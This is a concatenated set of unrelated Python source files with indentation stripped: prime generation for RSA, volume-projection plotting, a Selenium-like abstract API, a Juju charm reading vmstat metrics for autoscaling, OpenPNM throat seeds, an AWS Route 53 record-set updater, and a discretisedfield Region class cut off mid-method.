for count in range(iterations):
v = powMod(a, s, n)
if v == 1:
continue
i = 0
while v != n - 1:
if i == t - 1:
return False
else:
v, i = powMod(v, 2, n), i + 1
a = getRandomNumber(2, n)
return True
def getRandomPrime(bits, display = False):
if bits < 10:
raise AssertionError()
#The 1.5 ensures the 2 MSBs are set
#Thus, when used for p,q in RSA, n will have its MSB set
#
#Since 30 is lcm(2,3,5), we'll set our test numbers to
#29 % 30 and keep them there
low = (2 ** (bits - 1)) * 3 // 2
high = 2 ** bits - 30
p = getRandomNumber(low, high)
p += 29 - (p % 30)
while 1:
if display: print(".", end=" ")
p += 30
if p >= high:
p = getRandomNumber(low, high)
p += 29 - (p % 30)
if isPrime(p, display = display):
return p
#Unused at the moment...
def getRandomSafePrime(bits, display = False):
if bits < 10:
raise AssertionError()
#The 1.5 ensures the 2 MSBs are set
#Thus, when used for p,q in RSA, n will have its MSB set
#
#Since 30 is lcm(2,3,5), we'll set our test numbers to
#29 % 30 and keep them there
low = (2 ** (bits - 2)) * 3 // 2
high = (2 ** (bits - 1)) - 30
q = getRandomNumber(low, high)
q += 29 - (q % 30)
while 1:
if display: print(".", end=" ")
q += 30
if (q >= high):
q = getRandomNumber(low, high)
q += 29 - (q % 30)
#Ideas from Tom Wu's SRP code
#Do trial division on p and q before Rabin-Miller
if isPrime(q, 0, display = display):
p = (2 * q) + 1
if isPrime(p, display = display):
if isPrime(q, display = display):
return p
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Tools for visualizing volumetric data
#
# Davis Bennett
# davis.v.bennett@gmail.com
#
# License: MIT
#
from ..util.roi import ROI
from tqdm.auto import tqdm
def proj_plot(
volume,
proj_fun,
clims="auto",
figsize=4,
aspect=(1, 1, 1),
cmap="gray",
interpolation="Lanczos",
):
"""
Project and plot a volume along 3 axes using a user-supplied function, using separate subplots for each projection
volume : Numpy array, 3D (grayscale data) or 4D (RGB data).
data to be projected.
proj_fun : function to apply along each axis.
Some function of numpy arrays that takes axis as an argument, e.g. numpy.max()
clims : clims to use when displaying projections.
String or iterable with 3 elements. Default is 'auto', which means the 0th and 100th percentiles
will be used as the clims for each projection. If not auto, clims should be set to an iterable of length-2
iterables, each setting the clim for a projection. This setting is ignored if input array is 4D.
figsize : size of the figure containing the plots
Float or int
aspect : aspect ratios of each axis
Iterable of floats or ints.
cmap : color map used in plots. This setting is ignored if input array is 4D
"""
from numpy import percentile, hstack, swapaxes
from matplotlib.pyplot import subplots
ori = "lower"
projs = [proj_fun(volume, axis=axis) for axis in range(3)]
# calculate clims for grayscale if necessary
if clims == "auto":
clims = percentile(hstack([p.ravel() for p in projs]), (0, 100))
clims = (clims, clims, clims)
z, y, x = (
volume.shape[0] * aspect[0],
volume.shape[1] * aspect[1],
volume.shape[2] * aspect[2],
)
w = x + z
h = y + z
wr = x / w
hr = y / h
p_xy = projs[0]
p_zx = projs[1]
p_zy = swapaxes(projs[2], 0, 1)
fig, axs = subplots(nrows=2, ncols=2, figsize=(figsize, figsize * h / w))
axs[0][0].imshow(
p_xy,
origin=ori,
aspect="auto",
cmap=cmap,
clim=clims[0],
interpolation=interpolation,
)
axs[1][0].imshow(
p_zx,
origin=ori,
aspect="auto",
cmap=cmap,
clim=clims[1],
interpolation=interpolation,
)
axs[0][1].imshow(
p_zy,
origin=ori,
aspect="auto",
cmap=cmap,
clim=clims[2],
interpolation=interpolation,
)
axs[0][0].set_position([0, 1 - hr, wr, hr])
axs[0][1].set_position([wr, 1 - hr, 1 - wr, hr])
axs[1][0].set_position([0, 0, wr, 1 - hr])
axs[1][1].set_position([wr, 0, 1 - wr, 1 - hr])
[ax.axis("off") for ax in axs.ravel()]
return axs
def proj_fuse(data, fun, aspect=(1, 1, 1), fill_value=0, arrangement=[0, 1, 2]):
"""
Project a volume along 3 axes using a user-supplied function, returning a 2D composite of projections. If the input
array has the shape [z,y,x], the output shape will be: [z * aspect_z + y * aspect_y, z * aspect_z + x * aspect_x]
data : 3D numpy array
Volumetric data to be projected.
fun : Function to apply along each axis of the input array.
A function of numpy arrays that takes an axis as a second argument, e.g. numpy.max()
aspect : Iterable of floats or ints.
Amount to scale each axis when forming the composite of projections
fill_value : int or float
Default value in the array that this function returns. The corner of the output array that is not
covered by any projection keeps this value.
arrangement : list
Order in which the three projections are placed in the composite; must be [0, 1, 2] or [2, 0, 1].
"""
from numpy import array, zeros
from skimage.transform import resize
old_dims = array(data.shape)
new_dims = (array(aspect) * old_dims).astype(int)
stretched = (
zeros([new_dims[1] + new_dims[0], new_dims[2] + new_dims[0]]) + fill_value
)
projs = []
for axis, dim in enumerate(new_dims):
indexer = list(range(len(new_dims)))
indexer.pop(axis)
projs.append(
resize(
fun(data, axis), new_dims[indexer], mode="constant", preserve_range=True
)
)
if arrangement == [0, 1, 2]:
stretched[: new_dims[1], new_dims[2] :] = projs[2].T
stretched[new_dims[1] :, : new_dims[2]] = projs[1]
stretched[: new_dims[1], : new_dims[2]] = projs[0]
elif arrangement == [2, 0, 1]:
stretched[: new_dims[1], : new_dims[0]] = projs[2].T[:, ::-1]
stretched[new_dims[1] :, new_dims[0] :] = projs[1]
stretched[: new_dims[1], new_dims[0] :] = projs[0]
else:
raise ValueError("Arrangement must be [0, 1, 2] or [2, 0, 1]")
return stretched
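# Usage sketch (illustrative; `vol` is a hypothetical (z, y, x) numpy array):
#   composite = proj_fuse(vol, np.max, aspect=(1, 1, 1))
#   composite.shape == (vol.shape[1] + vol.shape[0], vol.shape[2] + vol.shape[0])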
def apply_cmap(data, cmap="gray", clim="auto", bytes=False):
"""
Apply a matplotlib colormap to a 2D or 3D numpy array and return the rgba data in float or uint8 format.
data : 2D or 3D numpy array
cmap : string denoting a matplotlib colormap
Colormap used for displaying frames from data. Defaults to 'gray'.
clim : length-2 list, tuple, or ndarray, or string
Upper and lower intensity limits to display from data. Defaults to 'auto'
If clim='auto', the min and max of data will be used as the clim.
Before applying the colormap, data will be clipped from clim[0] to clim[1].
bytes : bool, defaults to False
If true, return values are uint8 in the range 0-255. If false, return values are float in the range 0-1
"""
from matplotlib.colors import Normalize
from matplotlib.cm import ScalarMappable
from numpy import array
if clim == "auto":
clim = data.min(), data.max()
sm = ScalarMappable(Normalize(*clim, clip=True), cmap)
rgba = array([sm.to_rgba(d, bytes=bytes) for d in data])
return rgba
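# Usage sketch (illustrative): colour-mapping a stack of 2D frames,
#   rgba = apply_cmap(np.random.rand(10, 64, 64), cmap='viridis')
# returns an array of shape (10, 64, 64, 4) with float RGBA values in [0, 1].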
def depth_project(data, axis=0, cmap="jet", clim="auto", mode="sum"):
"""
Generate an RGB "depth projection" of a 3D numpy array.
Input data are normalized to [0,1] and data values along the projection axis are mapped
to indices in a linear RGBA colormap.
If `mode` is `sum`, for each element along the projection axis there is a color, and the brightness of this color is
scaled by the intensity values of the data. The output is the sum of the values along the projection axis,
i.e. a 3D array with the last dimension containing RGB values.
If 'mode' is 'max', then the intensity values are determined by the maximum intensity projection of data over the
projection axis, and the color of each pixel in the maximum projection is specified by the index where the maximum
value was attained. In the case of repeated maximal values, the index of the first is used.
data : 3D numpy array
axis : int denoting an axis to project over
cmap : string denoting a matplotlib colormap
clim : string, or list or tuple with length 2.
This argument determines the minimum and maximum intensity values to use before rescaling the data to the range
[0,1]. The default value, 'auto', specifies that the minimum and maximum values of the input data will be mapped
to [0,1].
mode : string determining which projection mode to use
"""
from numpy import linspace, zeros, array, argmax, all
from skimage.exposure import rescale_intensity as rescale
from matplotlib.cm import get_cmap
if clim == "auto":
clim = data.min(), data.max()
cm = get_cmap(cmap)(linspace(0, 1, data.shape[axis]))
data_r = rescale(data.astype("float32"), in_range=clim, out_range=(0, 1))
if mode == "sum":
cvol = zeros((*data.shape, 4))
data_r = array([data_r] * cm.shape[-1]).transpose(1, 2, 3, 0)
for ind in range(cvol.shape[axis]):
slices = [slice(None)] * cvol.ndim
slices[axis] = ind
slices = tuple(slices)
cvol[slices] = cm[ind] * data_r[slices]
proj = cvol.sum(axis)
proj[:, :, -1] = 1
proj[:, :, :-1] = rescale(
proj[:, :, :-1], in_range=(0, proj.max()), out_range=(0, 1)
)
elif mode == "max":
mx = data_r.max(axis)
dp = argmax(data_r, axis)
proj = (cm[dp, :].T * mx.T).T
else:
raise ValueError('Mode must be "sum" or "max"')
return proj
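# Usage sketch (illustrative; `vol` is a hypothetical (z, y, x) numpy array):
#   rgb = depth_project(vol, axis=0, cmap='jet', mode='max')
# gives a (y, x, 4) RGBA image whose colour encodes the z position of the maximum.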
def nparray_to_video(
fname,
data,
clim="auto",
cmap="gray",
codec="h264",
fps=24,
ffmpeg_params=["-pix_fmt", "yuv420p"],
):
"""
Save 3D (t, y, x) numpy array to disk as movie. Uses matplotlib colormaps for rescaling / coloring data,
and uses moviepy.editor.ImageSequenceClip for movie creation.
Warning : this function duplicates the input data in memory.
fname : string
Filename with extension (.avi, .mp4, etc).
data : 3D numpy array
Each 2D array along the first axis of data will be a frame in the movie.
clim : length-2 list, tuple, or ndarray, or string
Upper and lower intensity limits to display from data. Defaults to 'auto'
If clim='auto', the min and max of data will be used as the clim.
Before applying the colormap, data will be clipped from clim[0] to clim[1].
cmap : string denoting a matplotlib colormap
Colormap used for displaying frames from data. Defaults to 'gray'.
codec : string
Which video codec to use. Defaults to 'h264'. See moviepy.editor.ImageSequenceClip.write_videofile.
fps : int or float
Frames per second of the movie. Defaults to 24.
ffmpeg_params : list of strings
Arguments sent to ffmpeg during movie creation. Defaults to ['-pix_fmt', 'yuv420p'], which is necessary for
creating movies that OSX understands.
"""
from numpy import pad
from moviepy.editor import ImageSequenceClip
# ffmpeg errors if the dimensions of each frame are not divisible by 2
if data.shape[1] % 2 == 1:
data = pad(data, ((0, 0), (0, 1), (0, 0)), mode="minimum")
if data.shape[2] % 2 == 1:
data = pad(data, ((0, 0), (0, 0), (0, 1)), mode="minimum")
data_rgba = apply_cmap(data, cmap=cmap, clim=clim)
clip = ImageSequenceClip([d for d in data_rgba], fps=fps)
clip.write_videofile(
fname,
audio=False,
codec=codec,
fps=fps,
ffmpeg_params=ffmpeg_params,
bitrate="50000k",
)
class RoiDrawing(object):
"""
Class for drawing ROI on matplotlib figures
"""
def __init__(self, ax, image_data):
self.image_axes = ax
self._focus_index = -1
self.image_data = image_data
self.lines = []
self.rois = []
self.cid_press = self.image_axes.figure.canvas.mpl_connect(
"button_press_event", self.onpress
)
self.cid_release = self.image_axes.figure.canvas.mpl_connect(
"button_press_event", self.onpress
)
self.masks = []
self.selector = []
@property
def focus_index(self):
return self._focus_index
@focus_index.setter
def focus_index(self, value):
if value < 0:
value = 0
if value > (len(self.rois) - 1):
self.new_roi()
self._focus_index = value
def focus_incr(self, event=None):
self.focus_index += 1
def focus_decr(self, event=None):
self.focus_index -= 1
def new_roi(self, event=None):
self.lines.append(self.image_axes.plot([0], [0])[0])
self.rois.append(ROI(image=self.image_data, x=[], y=[]))
self.masks.append(None)
def onpress(self, event):
"""
Callback function for connection to the event manager.
"""
from matplotlib.widgets import Lasso
if event.inaxes != self.image_axes:
return
if self.image_axes.figure.canvas.widgetlock.locked():
return
self.focus_incr()
self.selector = Lasso(
event.inaxes, (event.xdata, event.ydata), self.update_line_from_verts
)
self.image_axes.figure.canvas.widgetlock(self.selector)
def update_line_from_verts(self, verts):
current_line = self.lines[self.focus_index]
current_roi = self.rois[self.focus_index]
for x, y in verts:
current_roi.x.append(x)
current_roi.y.append(y)
self.image_axes.figure.canvas.widgetlock.release(self.selector)
current_line.set_data(current_roi.x, current_roi.y)
current_line.figure.canvas.draw()
def wipe(self, event):
current_line = self.lines[self.focus_index]
current_roi = self.rois[self.focus_index]
current_roi.reset()
current_line.set_data(current_roi.x, current_roi.y)
current_line.figure.canvas.draw()
def draw_rois(self, axes):
for roi in self.rois:
axes.plot(roi.x, roi.y)
def get_masks(self):
self.masks = [roi.get_mask() for roi in self.rois]
def set_rois(self, list_of_rois):
self.rois = [ROI(image=self.image_data, x=roi.x, y=roi.y) for roi in tqdm(list_of_rois)]
|
from abc import abstractmethod, ABC
from base64 import b64decode
from pymobiledevice3.services.web_protocol.automation_session import By
class SeleniumApi(ABC):
@abstractmethod
def find_element(self, by=By.ID, value=None):
pass
@abstractmethod
def find_elements(self, by=By.ID, value=None):
pass
@property
@abstractmethod
def screenshot_as_base64(self):
pass
def find_element_by_class_name(self, name):
return self.find_element(By.CLASS_NAME, name)
def find_element_by_css_selector(self, css_selector):
return self.find_element(By.CSS_SELECTOR, css_selector)
def find_element_by_id(self, id_):
return self.find_element(value=id_)
def find_element_by_link_text(self, link_text):
return self.find_element(By.LINK_TEXT, link_text)
def find_element_by_name(self, name):
return self.find_element(By.NAME, name)
def find_element_by_partial_link_text(self, link_text):
return self.find_element(By.PARTIAL_LINK_TEXT, link_text)
def find_element_by_tag_name(self, name):
return self.find_element(By.TAG_NAME, name)
def find_element_by_xpath(self, xpath):
return self.find_element(By.XPATH, xpath)
def find_elements_by_class_name(self, name):
return self.find_elements(By.CLASS_NAME, name)
def find_elements_by_css_selector(self, css_selector):
return self.find_elements(By.CSS_SELECTOR, css_selector)
def find_elements_by_id(self, id_):
return self.find_elements(value=id_)
def find_elements_by_link_text(self, link_text):
return self.find_elements(By.LINK_TEXT, link_text)
def find_elements_by_name(self, name):
return self.find_elements(By.NAME, name)
def find_elements_by_partial_link_text(self, link_text):
return self.find_elements(By.PARTIAL_LINK_TEXT, link_text)
def find_elements_by_tag_name(self, name):
return self.find_elements(By.TAG_NAME, name)
def find_elements_by_xpath(self, xpath):
return self.find_elements(By.XPATH, xpath)
def screenshot(self, filename):
png = self.screenshot_as_png()
try:
with open(filename, 'wb') as f:
f.write(png)
except IOError:
return False
return True
def screenshot_as_png(self):
return b64decode(self.screenshot_as_base64.encode('ascii'))
def get_screenshot_as_base64(self):
return self.screenshot_as_base64
def get_screenshot_as_file(self, filename):
return self.screenshot(filename)
def get_screenshot_as_png(self):
return self.screenshot_as_png()
def save_screenshot(self, filename) -> bool:
return self.screenshot(filename)
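# Usage sketch (illustrative; `driver` is a hypothetical concrete subclass of SeleniumApi):
#   element = driver.find_element_by_css_selector('#login')  # delegates to find_element(By.CSS_SELECTOR, '#login')
#   driver.save_screenshot('page.png')                       # decodes screenshot_as_base64 and writes a PNG file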
|
import sys
sys.path.append('lib')
import charms.sshproxy
from charmhelpers.core.hookenv import (
config,
log)
from charms.reactive import set_state, clear_flag
def get_vnf_metrics():
# Get VNF Metrics
metrics = dict()
try:
cmd = ['vmstat', '--one-header', '--active',
'1', # interval
'2', # count
]
result, err = charms.sshproxy._run(cmd, keep_alive=True)
log("Err: " + err)
lines = result.split('\n')
for line in lines:
log("LINE: " + line)
if len(lines) >= 4:
cols = lines[1].split()
vals = lines[3].split()
for col, val in zip(cols, vals):
if col == 'us': col = 'cpu_user'
if col == 'sy': col = 'cpu_system'
if col == 'id': col = 'cpu_idle'
if col == 'wa': col = 'cpu_waiting'
if col == 'st': col = 'cpu_stolen'
if col == 'free': col = 'mem_free'
if col == 'buff': col = 'mem_buffers'
if col == 'cache': col = 'mem_cached'
if col == 'inact': col = 'mem_inactive'
if col == 'active': col = 'mem_active'
log('METRIC: %s=%s' % (col, val))
metrics[col] = val
except Exception as e:
log('Metrics Evaluation failed:' + str(e), level='ERROR')
return metrics
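# For reference, the parser above assumes the usual vmstat output layout (roughly):
#   lines[0]  procs -----------memory---------- ---swap-- ... (category header)
#   lines[1]  r  b  swpd  free  buff  cache  si  so  bi  bo  in  cs  us  sy  id  wa  st (column names)
#   lines[2]  first sample (averages since boot)
#   lines[3]  second sample after the 1 second interval (the values used above)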
def evaluate_vnt_metrics(metrics):
log('evaluate_vnt_metrics')
log(metrics)
try:
cpu_used = 100 - int(metrics['cpu_idle'])
log('cpu_used: %d' % cpu_used)
cfg = config()
log('scaleout_cpu_treshold: %d' % cfg['scaleout_cpu_treshold'])
log('scalein_cpu_treshold: %d' % cfg['scalein_cpu_treshold'])
if cpu_used > int(cfg['scaleout_cpu_treshold']):
set_state('scaling.out')
clear_flag('scaling.in')
elif cpu_used < int(cfg['scalein_cpu_treshold']):
clear_flag('scaling.out')
set_state('scaling.in')
else:
clear_flag('scaling.out')
clear_flag('scaling.in')
except Exception as e:
log('Metrics Evaluation failed:' + str(e), level='ERROR')
log('Metrics Evaluation failed: ' + str(sys.exc_info()), level='WARN')
|
r"""
===============================================================================
Submodule -- throat_seeds
===============================================================================
"""
import scipy as _sp
def random(geometry, seed=None, num_range=[0, 1], **kwargs):
r"""
Assign random numbers to throats, for use in statistical distributions that
return throat size
Parameters
----------
seed : int
The starting seed value to send to Scipy's random number generator.
The default is None, which means a different distribution is returned
each time the model is run.
num_range : list
A two element list indicating the low and high end of the returned
numbers.
"""
range_size = num_range[1] - num_range[0]
range_min = num_range[0]
_sp.random.seed(seed)
value = _sp.random.rand(geometry.num_throats(),)
value = value*range_size + range_min
return value
def neighbor(geometry, network, pore_prop='pore.seed', mode='min', **kwargs):
r"""
Adopt a value based on the values in the neighboring pores
Parameters
----------
mode : string
Indicates how to select the values from the neighboring pores. The
options are:
- min : (Default) Uses the minimum of the value found in the neighbors
- max : Uses the maximum of the values found in the neighbors
- mean : Uses an average of the neighbor values
pore_prop : string
The dictionary key containing the pore property to be used.
"""
throats = network.throats(geometry.name)
P12 = network.find_connected_pores(throats)
pvalues = network[pore_prop][P12]
if mode == 'min':
value = _sp.amin(pvalues, axis=1)
if mode == 'max':
value = _sp.amax(pvalues, axis=1)
if mode == 'mean':
value = _sp.mean(pvalues, axis=1)
return value
|
import os
import sys
import json
import boto3
from distutils import util
class AWSRoute53RecordSet:
"""
Primary class for the handling of AWS Route 53 Record Sets.
"""
def __init__(self):
"""
The default constructor.
"""
self.client = None
self.waiter = None
self.rr_skeleton = dict()
def _get_env(self, variable, exit=True):
"""
Try to fetch a variable from the environment.
Per default the method will raise an exception if the variable isn't present.
This behaviour can be switched off via the exit flag.
"""
value = os.environ.get(variable)
if not value and exit:
raise NameError("Cannot find environment variable: " + str(variable))
return value
def _connect(self):
"""
Creates a new client object which wraps the connection to AWS.
"""
if not self.client:
boto3.set_stream_logger('botocore', level='DEBUG')
self.client = boto3.client(
"route53"
)
self.waiter = self.client.get_waiter("resource_record_sets_changed")
def _set_comment(self):
"""
Appends an additional comment field to the record set.
"""
comment = self._get_env("INPUT_AWS_ROUTE53_RR_COMMENT", False)
if comment:
self.rr_skeleton["Comment"] = comment
def _set_base_changes(self):
"""
Creates the base skeleton required for creating a new record set.
"""
self.rr_skeleton["Changes"] = [{
"Action": self._get_env("INPUT_AWS_ROUTE53_RR_ACTION"),
"ResourceRecordSet": {
"Name": self._get_env("INPUT_AWS_ROUTE53_RR_NAME"),
"Type": self._get_env("INPUT_AWS_ROUTE53_RR_TYPE"),
"TTL": int(self._get_env("INPUT_AWS_ROUTE53_RR_TTL", exit=False)) or 300,
"ResourceRecords": [{
"Value": self._get_env("INPUT_AWS_ROUTE53_RR_VALUE")
}]
}
}]
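# Example of the ChangeBatch skeleton this builds (illustrative values only,
# standing in for hypothetical INPUT_AWS_ROUTE53_RR_* environment variables):
#   {"Changes": [{"Action": "UPSERT",
#                 "ResourceRecordSet": {"Name": "www.example.com.", "Type": "A", "TTL": 300,
#                                       "ResourceRecords": [{"Value": "203.0.113.10"}]}}]}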
def _build_record_set(self):
"""
Builds up the skeleton used for modulating the record set.
"""
self._set_comment()
self._set_base_changes()
return self.rr_skeleton
def _change_record_set(self, record_set):
"""
Requests the required change at AWS.
"""
return self.client.change_resource_record_sets(
HostedZoneId=self._get_env("INPUT_AWS_ROUTE53_HOSTED_ZONE_ID"),
ChangeBatch=record_set
)
def _wait(self, request_id):
"""
Waits until the requested operations is finished.
"""
wait = self._get_env("INPUT_AWS_ROUTE53_WAIT", False)
if wait and util.strtobool(wait):
self.waiter.wait(
Id=request_id,
WaiterConfig={
"Delay": 10,
"MaxAttempts": 50
}
)
def _obtain_request_id(self, result):
"""
Grabs and returns the id of the given request.
"""
return result["ChangeInfo"]["Id"]
def _obtain_marshalled_result(self, result):
"""
Grabs and returns the HTTP response of the given request.
"""
return json.dumps(result["ResponseMetadata"], indent=4)
def change(self):
"""
Entrypoint for the management of a record set.
"""
self._connect()
record_set = self._build_record_set()
result = self._change_record_set(record_set)
self._wait(
self._obtain_request_id(result)
)
sys.stdout.write(
self._obtain_marshalled_result(result) + "\n"
)
try:
o = AWSRoute53RecordSet()
o.change()
except Exception as e:
sys.stderr.write(str(e) + "\n")
sys.exit(1)
|
import k3d
import random
import numpy as np
import matplotlib.pyplot as plt
import ubermagutil.units as uu
import ubermagutil.typesystem as ts
import discretisedfield.util as dfu
@ts.typesystem(p1=ts.Vector(size=3, const=True),
p2=ts.Vector(size=3, const=True))
class Region:
"""A cuboid region.
A cuboid region spans between two corner points :math:`\\mathbf{p}_{1}` and
:math:`\\mathbf{p}_{2}`. Points ``p1`` and ``p2`` can be any two diagonally
opposite points. If any of the edge lengths of the cuboid region is zero,
``ValueError`` is raised.
Parameters
----------
p1 / p2 : (3,) array_like
Diagonally opposite corner points :math:`\\mathbf{p}_{i} = (p_{x},
p_{y}, p_{z})`.
Raises
------
ValueError
If any region's edge length is zero.
Examples
--------
1. Defining a nano-sized region.
>>> import discretisedfield as df
...
>>> p1 = (-50e-9, -25e-9, 0)
>>> p2 = (50e-9, 25e-9, 5e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region
Region(...)
2. An attempt to define a region, where one of the edge lengths is zero.
>>> # The edge length in the z-direction is zero.
>>> p1 = (-25, 3, 1)
>>> p2 = (25, 6, 1)
>>> region = df.Region(p1=p1, p2=p2)
Traceback (most recent call last):
...
ValueError: ...
"""
def __init__(self, p1, p2):
self.p1 = tuple(p1)
self.p2 = tuple(p2)
if np.equal(self.edges, 0).any():
msg = f'One of the region edge lengths is zero: {self.edges=}.'
raise ValueError(msg)
@property
def pmin(self):
"""Point with minimum coordinates in the region.
The :math:`i`-th component of :math:`\\mathbf{p}_\\text{min}` is
computed from points :math:`p_{1}` and :math:`p_{2}` between which the
cuboid region spans: :math:`p_\\text{min}^{i} = \\text{min}(p_{1}^{i},
p_{2}^{i})`.
Returns
-------
tuple (3,)
Point with minimum coordinates :math:`(p_{x}^\\text{min},
p_{y}^\\text{min}, p_{z}^\\text{min})`.
Examples
--------
1. Getting the minimum coordinate point.
>>> import discretisedfield as df
...
>>> p1 = (-1.1, 2.9, 0)
>>> p2 = (5, 0, -0.1)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.pmin
(-1.1, 0.0, -0.1)
.. seealso:: :py:func:`~discretisedfield.Region.pmax`
"""
return dfu.array2tuple(np.minimum(self.p1, self.p2))
@property
def pmax(self):
"""Point with maximum coordinates in the region.
The :math:`i`-th component of :math:`\\mathbf{p}_\\text{max}` is
computed from points :math:`p_{1}` and :math:`p_{2}` between which the
cuboid region spans: :math:`p_\\text{max}^{i} = \\text{max}(p_{1}^{i},
p_{2}^{i})`.
Returns
-------
tuple (3,)
Point with maximum coordinates :math:`(p_{x}^\\text{max},
p_{y}^\\text{max}, p_{z}^\\text{max})`.
Examples
--------
1. Getting the maximum coordinate point.
>>> import discretisedfield as df
...
>>> p1 = (-1.1, 2.9, 0)
>>> p2 = (5, 0, -0.1)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.pmax
(5.0, 2.9, 0.0)
.. seealso:: :py:func:`~discretisedfield.Region.pmin`
"""
return dfu.array2tuple(np.maximum(self.p1, self.p2))
@property
def edges(self):
"""Edge lengths of the region.
Edge length is computed from the points between which the region spans
:math:`\\mathbf{p}_{1}` and :math:`\\mathbf{p}_{2}`:
.. math::
\\mathbf{l} = (|p_{2}^{x} - p_{1}^{x}|, |p_{2}^{y} - p_{1}^{y}|,
|p_{2}^{z} - p_{1}^{z}|).
Returns
-------
tuple (3,)
Edge lengths :math:`(l_{x}, l_{y}, l_{z})`.
Examples
--------
1. Getting edge lengths of the region.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, -5)
>>> p2 = (5, 15, 15)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.edges
(5, 15, 20)
"""
return dfu.array2tuple(np.abs(np.subtract(self.p1, self.p2)))
@property
def centre(self):
"""Centre point.
It is computed as the middle point between minimum and maximum point
coordinates:
.. math::
\\mathbf{p}_\\text{centre} = \\frac{1}{2} (\\mathbf{p}_\\text{min}
+ \\mathbf{p}_\\text{max}).
Returns
-------
tuple (3,)
Centre point :math:`(p_{c}^{x}, p_{c}^{y}, p_{c}^{z})`.
Examples
--------
1. Getting the centre point.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (5, 15, 20)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.centre
(2.5, 7.5, 10.0)
"""
return dfu.array2tuple(np.multiply(np.add(self.pmin, self.pmax), 0.5))
@property
def volume(self):
"""Region volume.
It is computed by multiplying edge lengths of the region:
.. math::
V = l_{x} l_{y} l_{z}.
Returns
-------
numbers.Real
Volume of the region.
Examples
--------
1. Computing the volume of the region.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (5, 10, 2)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.volume
100.0
"""
return float(np.prod(self.edges))
def random_point(self):
"""Generate a random point in the region.
The use of this function is mostly for writing tests. This method is
not a property and it is called as
``discretisedfield.Region.random_point()``.
Returns
-------
tuple (3,)
Random point coordinates :math:`\\mathbf{p}_\\text{r} =
(p_{x}^\\text{r}, p_{y}^\\text{r}, p_{z}^\\text{r})`.
Examples
--------
1. Generating a random point.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (200e-9, 200e-9, 1e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.random_point()
(...)
.. note::
In this example, ellipsis is used instead of an exact tuple because
the result differs each time
``discretisedfield.Region.random_point`` method is called.
"""
res = np.add(self.pmin, np.multiply(np.random.random(3), self.edges))
return dfu.array2tuple(res)
def __repr__(self):
"""Representation string.
Returns
-------
str
Representation string.
Example
-------
1. Getting representation string.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (2, 2, 1)
>>> region = df.Region(p1=p1, p2=p2)
>>> repr(region)
'Region(p1=(0, 0, 0), p2=(2, 2, 1))'
"""
return f'Region(p1={self.pmin}, p2={self.pmax})'
def __eq__(self, other):
"""Relational operator ``==``.
Two regions are considered to be equal if they have the same minimum
and maximum coordinate points: :math:`\\mathbf{p}^\\text{max}_{1} =
\\mathbf{p}^\\text{max}_{2}` and :math:`\\mathbf{p}^\\text{min}_{1} =
\\mathbf{p}^\\text{min}_{2}`.
Parameters
----------
other : discretisedfield.Region
Second operand.
Returns
-------
bool
``True`` if two regions are equal and ``False`` otherwise.
Examples
--------
1. Check if regions are equal.
>>> import discretisedfield as df
...
>>> region1 = df.Region(p1=(0, 0, 0), p2=(5, 5, 5))
>>> region2 = df.Region(p1=(0.0, 0, 0), p2=(5.0, 5, 5))
>>> region3 = df.Region(p1=(1, 1, 1), p2=(5, 5, 5))
>>> region1 == region2
True
>>> region1 != region2
False
>>> region1 == region3
False
>>> region1 != region3
True
"""
atol = 1e-15
rtol = 1e-5
if not isinstance(other, self.__class__):
return False
elif (np.allclose(self.pmin, other.pmin, atol=atol, rtol=rtol) and
np.allclose(self.pmax, other.pmax, atol=atol, rtol=rtol)):
return True
else:
return False
def __contains__(self, other):
"""Determine if a point or another region belong to the region.
Point is considered to be in the region if
.. math::
p^\\text{min}_{i} \\le p_{i} \\le p^\\text{max}_{i}, \\text{for}\\,
i = x, y, z.
Similarly, if the second operand is ``discretisedfield.Region`` object,
it is considered to be in the region if both its ``pmin`` and ``pmax``
belong to the region.
Parameters
----------
other : (3,) array_like or discretisedfield.Region
The point coordinate :math:`(p_{x}, p_{y}, p_{z})` or a region
object.
Returns
-------
bool
``True`` if ``other`` is inside the region and ``False`` otherwise.
Example
-------
1. Check if point is inside the region.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (2, 2, 1)
>>> region = df.Region(p1=p1, p2=p2)
>>> (1, 1, 1) in region
True
>>> (1, 3, 1) in region
False
>>> # corner points are considered to be in the region
>>> p1 in region
True
>>> p2 in region
True
2. Check if another region belongs to the region.
>>> df.Region(p1=(0, 0, 0), p2=(1, 1, 1)) in region
True
>>> df.Region(p1=(0, 0, 0), p2=(2, 2, 2)) in region
False
>>> # Region is considered to be in itself
>>> region in region
True
"""
if isinstance(other, self.__class__):
return other.pmin in self and other.pmax in self
elif np.logical_or(np.less(other, self.pmin),
np.greater(other, self.pmax)).any():
return False
return True
def __or__(self, other):
"""Facing surface.
Parameters
----------
other : discretisedfield.Region
Second operand.
Returns
-------
tuple : (3,)
The first element is the axis facing surfaces are perpendicular to.
If we start moving along that axis (e.g. from minus infinity) the
first region we are going to enter is the region which is the
second element of the tuple. When we leave that region, we enter
the second region, which is the third element of the tuple.
Examples
--------
1. Find facing surfaces.
>>> import discretisedfield as df
...
>>> p11 = (0, 0, 0)
>>> p12 = (100e-9, 50e-9, 20e-9)
>>> region1 = df.Region(p1=p11, p2=p12)
...
>>> p21 = (0, 0, 20e-9)
>>> p22 = (100e-9, 50e-9, 30e-9)
>>> region2 = df.Region(p1=p21, p2=p22)
...
>>> res = region1 | region2
>>> res[0]
'z'
>>> res[1] == region1
True
>>> res[2] == region2
True
"""
if not isinstance(other, self.__class__):
msg = (f'Unsupported operand type(s) for |: '
f'{type(self)=} and {type(other)=}.')
raise TypeError(msg)
for i in range(3):
if self.pmin[i] >= other.pmax[i]:
return (dfu.raxesdict[i], other, self)
if other.pmin[i] >= self.pmax[i]:
return (dfu.raxesdict[i], self, other)
else:
msg = 'Cannot find facing surfaces'
